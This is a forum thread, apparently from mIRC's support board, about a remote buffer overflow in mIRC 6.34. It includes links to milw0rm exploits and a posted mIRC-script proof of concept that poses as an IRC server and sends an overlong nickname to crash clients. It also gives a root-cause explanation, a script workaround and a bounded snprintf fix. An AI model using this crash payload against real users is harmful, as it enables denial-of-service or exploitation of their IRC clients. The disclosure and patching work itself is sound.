
Mirc 6.34 Remote Buffer Overflow

Posted By: emm1

Mirc 6.34 Remote Buffer Overflow - 03/10/08 08:38 AM

Hello, I was just notified of this bug here. Hopefully someone can address it quickly.

http://www.milw0rm.com/exploits/6654

Posted By: Collective

Re: Mirc 6.34 Remote Buffer Overflow - 03/10/08 11:05 AM

Confirmed, crashes a clean mIRC 6.34.

Posted By: Khaled

Re: Mirc 6.34 Remote Buffer Overflow - 03/10/08 11:36 AM

This is a server-based exploit, not a user-based exploit, so as long as you're connecting to a trusted IRC network, such as one of the major networks, you should be fine.

That said, I can't seem to reproduce this issue here so far, neither in a clean install of the release version nor in a debug version of mIRC.

When I test the Perl script and make mIRC connect to the local Perl server, nothing happens, other than a disconnect from the server because the server sequence is incorrect.

When I test the same string sequence using internal debugging in mIRC, again nothing happens other than mIRC opening a query window to that user.

I'll continue to try to reproduce this issue and if verified I should have an update out shortly.

Posted By: Pivo

Re: Mirc 6.34 Remote Buffer Overflow - 04/10/08 12:53 PM

That Perl Script is crashing both my modified and my clean installation of mIRC.
Screenshot
Windows XP Service Pack 3, mIRC 6.34, ...

Edit: I have translated this into an mIRC script, for easier testing...
To start listening, type /crash ...
Code:
alias crash {
  ; check for open sockets
  if ($sock(crashing*)) {
    sockclose crashing*
    echo -sgt Crash-Sockets closed.
    return
  }

  ; determining port
  var %p = 6667
  while (!$portfree(%p) && %p <= 65535) { inc %p }
  if (%p >= 65536) { echo -sgt ERROR: Socket could not be created. | return }

  ; listening
  socklisten crashing %p
  if (!$sock(crashing)) { echo -sgt ERROR: Socket could not be created. | return }
  echo -sgt Crash-Socket listening...
  echo -sgt Type /server localhost %p to crash mirc.
}

on *:socklisten:crashing: {
  var %s = crashing. $+ $ticks
  sockaccept %s
  sockwrite -n %s :irc_server.stuff 001 yow :Welcome to the Internet Relay Network yow
  sockwrite -n %s $+(:,$str(A,313),CC) PRIVMSG yow : /FINGER yow.
  echo -sgt Sending crash-message to $sock(%s).ip
  .timer 1 3 sockclose %s
}

Posted By: DONGS

Re: Mirc 6.34 Remote Buffer Overflow - 05/10/08 12:58 AM

http://www.milw0rm.com/exploits/6666

Can you fix it now?

Posted By: Sat

Re: Mirc 6.34 Remote Buffer Overflow - 05/10/08 10:24 AM

The problem is with the sprintf(buf, "f%s", nick); of the code getting the font for the new query window from mirc.ini - buf is 300 bytes, nick is taken directly from the server.

Temporary workaround until the new mIRC is out:
Code:
on ^*:OPEN:?:*:if ($len($nick) > 298) halt

Other, more invasive workarounds: use a dedicated query window, put queries on ignore, etc.
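
The overflow described in the post above, as an added C example that is not part of the original post and not mIRC's own code: the unbounded `sprintf(buf, "f%s", nick)` pattern replaced by a length-checked `snprintf`. The 300-byte buffer and the `"f%s"` format come from the post; the function names, the constant name and the test nick lengths are hypothetical.

```c
#include <stdio.h>
#include <string.h>

#define FONT_KEY_SIZE 300 /* buffer size stated in the post */

/* Pattern described in the post (unbounded, overflows for long nicks):
 *     sprintf(buf, "f%s", nick);
 * Hardened form: bounded write, and truncation is treated as an error.
 * Returns 0 on success, -1 if "f" + nick + NUL does not fit in buf. */
int build_font_key(char *buf, size_t bufsize, const char *nick)
{
    int n;
    if (buf == NULL || nick == NULL || bufsize == 0)
        return -1;
    n = snprintf(buf, bufsize, "f%s", nick);
    if (n < 0 || (size_t)n >= bufsize) {
        buf[0] = '\0'; /* never hand a truncated key to the caller */
        return -1;
    }
    return 0;
}

/* Longest nick that fits: one byte for 'f', one for the terminator. */
size_t max_safe_nick_len(size_t bufsize)
{
    return bufsize >= 2 ? bufsize - 2 : 0;
}

/* Hypothetical helper: run the check on a constructed nick of `len` 'A's. */
int try_nick_of_length(size_t len)
{
    char nick[512];
    char buf[FONT_KEY_SIZE];
    if (len >= sizeof nick)
        return -1;
    memset(nick, 'A', len);
    nick[len] = '\0';
    return build_font_key(buf, sizeof buf, nick);
}

int main(void)
{
    size_t lens[] = { 9, 298, 299, 315 }; /* constructed test lengths */
    size_t i;
    for (i = 0; i < sizeof lens / sizeof lens[0]; i++)
        printf("nick length %zu -> %s\n", lens[i],
               try_nick_of_length(lens[i]) == 0 ? "accepted" : "rejected");
    return 0;
}
```

The 298-character limit this check enforces is the same threshold used by the `$len($nick) > 298` workaround above.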

Posted By: Khaled

Re: Mirc 6.34 Remote Buffer Overflow - 07/10/08 05:15 PM

Thanks, I have been able to reproduce this issue and should have an update ready for release soon. In the meantime, the above script-based fix posted by Sat resolves the issue, as does enabling the "Use single message window" option in the mIRC Options/IRC dialog.

Posted By: Trashlord_

Re: Mirc 6.34 Remote Buffer Overflow - 07/10/08 09:59 PM

Just wanted to add that I have tested this under WINE in Linux, and mIRC crashes there as well.